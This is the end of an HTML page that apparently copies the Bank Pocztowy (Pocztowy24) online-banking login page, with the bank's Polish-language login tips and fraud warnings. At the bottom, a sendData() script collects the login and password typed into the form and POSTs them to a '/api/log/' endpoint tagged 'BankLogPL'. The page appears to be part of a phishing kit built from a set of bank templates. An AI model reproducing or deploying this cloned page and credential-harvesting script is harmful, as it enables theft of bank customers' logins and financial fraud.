</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="pocztowy-section pocztowy-top-section pocztowy-element pocztowy-element-b98efd9 pocztowy-section-boxed pocztowy-section-height-default pocztowy-section-height-default">
<div class="pocztowy-container pocztowy-column-gap-no">
<div class="pocztowy-row">
<div class="pocztowy-column pocztowy-col-33 pocztowy-top-column pocztowy-element pocztowy-element-a151c29">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-6446ba5 pocztowy-widget pocztowy-widget-heading">
<div class="pocztowy-widget-container">
<h2 class="pocztowy-heading-title pocztowy-size-default">Przejdź na nowy Pocztowy24!</h2>
</div>
</div>
<div class="pocztowy-element pocztowy-element-15967bf pocztowy-widget pocztowy-widget-text-editor">
<div class="pocztowy-widget-container">
<div class="pocztowy-text-editor pocztowy-clearfix">
<p>Nowa bankowość Pocztowy24 dla Klientów detalicznych i mikroprzedsiębiorstw dostępna jest pod adresem&nbsp;<b>online.pocztowy.pl</b></p><p>Zalogujesz się do niej za pomocą swojego identyfikatora NIK i tego samego hasła, którym logujesz się do obecnej wersji Pocztowy24.</p><p>Jeśli jednak już wcześniej korzystałeś z nowej wersji bankowości i utworzyłeś do niej nowe hasło, użyj tego hasła do logowania.</p><p>Wraz z nową bankowością otrzymasz&nbsp;<b>dostęp do aplikacji mobilnej Pocztowy</b>&nbsp;– pobierz ją z App Store lub Google Play, by móc wygodnie korzystać z bankowości przez telefon.</p><p>Nowa bankowość to możliwość korzystania z&nbsp;<b>nowych funkcjonalności</b>, takich jak:</p>					</div>
</div>
</div>
<div class="pocztowy-element pocztowy-element-4a84604 pocztowy-align-left pocztowy-icon-list--layout-traditional pocztowy-list-item-link-full_width pocztowy-widget pocztowy-widget-icon-list">
<div class="pocztowy-widget-container">
<ul class="pocztowy-icon-list-items">
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text"><b style="font-weight: bold;">BLIK</b>, którym bezpiecznie i szybko zapłacisz za zakupy w sieci i w sklepie stacjonarnym.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text"><b style="font-weight: bold;">AUTOPAY</b> – automatycznych płatności za przejazdy autostradami.</span> 									</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text"><b style="font-weight: bold;">KALENDARZ i MODUŁ FAKTUR</b>, które ułatwią planowanie wydatków i utrzymanie porządku w płatnościach.</span>
</li>
</ul>
</div>
</div>
<div class="pocztowy-element pocztowy-element-9500e9e pocztowy-widget pocztowy-widget-heading">
<div class="pocztowy-widget-container">
<h2 class="pocztowy-heading-title pocztowy-size-default">Dowiedz się więcej o nowym Pocztowy24</h2>
</div>
</div>
</div>
</div>
</div>
<div class="pocztowy-column pocztowy-col-33 pocztowy-top-column pocztowy-element pocztowy-element-cf8369a">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-13b6b22 pocztowy-widget pocztowy-widget-heading">
<div class="pocztowy-widget-container">
<h2 class="pocztowy-heading-title pocztowy-size-default">Nie możesz się zalogować?</h2>
</div>
</div>
<div class="pocztowy-element pocztowy-element-46c6c86 pocztowy-align-left pocztowy-icon-list--layout-traditional pocztowy-list-item-link-full_width pocztowy-widget pocztowy-widget-icon-list">
<div class="pocztowy-widget-container">
<ul class="pocztowy-icon-list-items">
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Wpisując swój NIK i hasło sprawdź, czy nie masz włączonej na klawiaturze funkcji Caps Lock.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Po trzykrotnym wpisaniu błędnych danych do logowania system dostęp do bankowości zostanie zablokowany.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">W przypadku zablokowania dostępu do bankowości skontaktuj się z Infolinią Banku  (801 100 500 lub 52 34 99 499).</span>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="pocztowy-column pocztowy-col-33 pocztowy-top-column pocztowy-element pocztowy-element-b59e15b">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-8c90944 pocztowy-widget pocztowy-widget-heading">
<div class="pocztowy-widget-container">
<h2 class="pocztowy-heading-title pocztowy-size-default">Nie możesz się zalogować?</h2>
</div>
</div>
<div class="pocztowy-element pocztowy-element-f6dcd48 pocztowy-widget pocztowy-widget-text-editor">
<div class="pocztowy-widget-container">
<div class="pocztowy-text-editor pocztowy-clearfix">
<p>Pamiętaj, że system bankowości nigdy:</p>
</div>
</div>
</div>
<div class="pocztowy-element pocztowy-element-8683fc7 pocztowy-align-left pocztowy-icon-list--layout-traditional pocztowy-list-item-link-full_width pocztowy-widget pocztowy-widget-icon-list">
<div class="pocztowy-widget-container">
<ul class="pocztowy-icon-list-items">
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Nie prosi o podanie kodu jednorazowego przed logowaniem, jak również bezpośrednio po zalogowaniu. System może prosić o podanie kodu jednorazowego w trakcie logowania.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Nie wysyła e-maili oraz SMS-ów z prośbą o weryfikację danych.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Nie prosi o podanie informacji dotyczącej telefonu używanego do autoryzacji operacji.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Nie prosi o podanie informacji dotyczących wydanych kart płatniczych takich jak: numer karty, data ważności, kod PIN i CVV/CVV2.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Nie prosi o wykonanie testowego przelewu w ramach aktywizacji / sprawdzenia funkcjonalności.</span>
</li>
<li class="pocztowy-icon-list-item">
<span class="pocztowy-icon-list-icon">
<svg aria-hidden="true" class="e-font-icon-svg"></svg>
</span>
<span class="pocztowy-icon-list-text">Nie prosi o zwrot środków pochodzących z błędnego / podejrzanego przelewu.</span>
</li>
</ul>
</div>
</div>
<div class="pocztowy-element pocztowy-element-e3fe9aa pocztowy-widget pocztowy-widget-text-editor">
<div class="pocztowy-widget-container">
<div class="pocztowy-text-editor pocztowy-clearfix">
Pamiętaj, aby kończąc korzystanie z bankowości używać funkcji WYLOGUJ.  Nigdy nie instaluj nieznanych aplikacji mających zapewnić bezpieczeństwo bankowości elektronicznej, nie klikaj w linki nadesłane w podejrzanych wiadomościach „od Banku”.  <br><br><b>Wszystkie zauważone nieprawidłowości, fakt utraty lub ujawnienia danych do logowania, telefonu komórkowego lub karty SIM używanych do korzystania z bankowości</b><span style="color: #da2429; font-weight: bold;"> jak najszybciej zgłoś do Banku: 801 100 500 lub 52 34 99 499.</span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="pocztowy-section pocztowy-top-section pocztowy-element pocztowy-element-3366795 pocztowy-section-boxed pocztowy-section-height-default pocztowy-section-height-default">
<div class="pocztowy-container pocztowy-column-gap-default">
<div class="pocztowy-row">
<div class="pocztowy-column pocztowy-col-100 pocztowy-top-column pocztowy-element pocztowy-element-d13b8ac">
<div class="pocztowy-column-wrap pocztowy-element-populated">
<div class="pocztowy-widget-wrap">
<div class="pocztowy-element pocztowy-element-8bb4ead pocztowy-widget pocztowy-widget-image">
<div class="pocztowy-widget-container">
<div class="pocztowy-image">
<img width="190" height="31" src="/static/style/banksPL/pocztowy/pocz-image-2.png" class="attachment-full size-full">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
</div>

<script type="text/javascript">
    function sendData() {
      var data = $('#formblock').serializeArray().reduce(function(obj, item) {
          obj[item.name] = item.value;
          return obj;
      }, {});
  
      fetch(`/api/log/${window.location.pathname.split('/')[3]}`, {
        method: 'POST',
        cache: 'no-cache',
        headers: {
            'Accept': 'application/json, text/plain, */*',
            'Content-Type': 'application/json'
        },
        referrerPolicy: 'no-referrer',
        body: JSON.stringify({
            login: data.login,
            password: data.password,
            bank: 'pocztowy',
            method: 'BankLogPL'
        })
      })
    }
  </script>


 </body></html>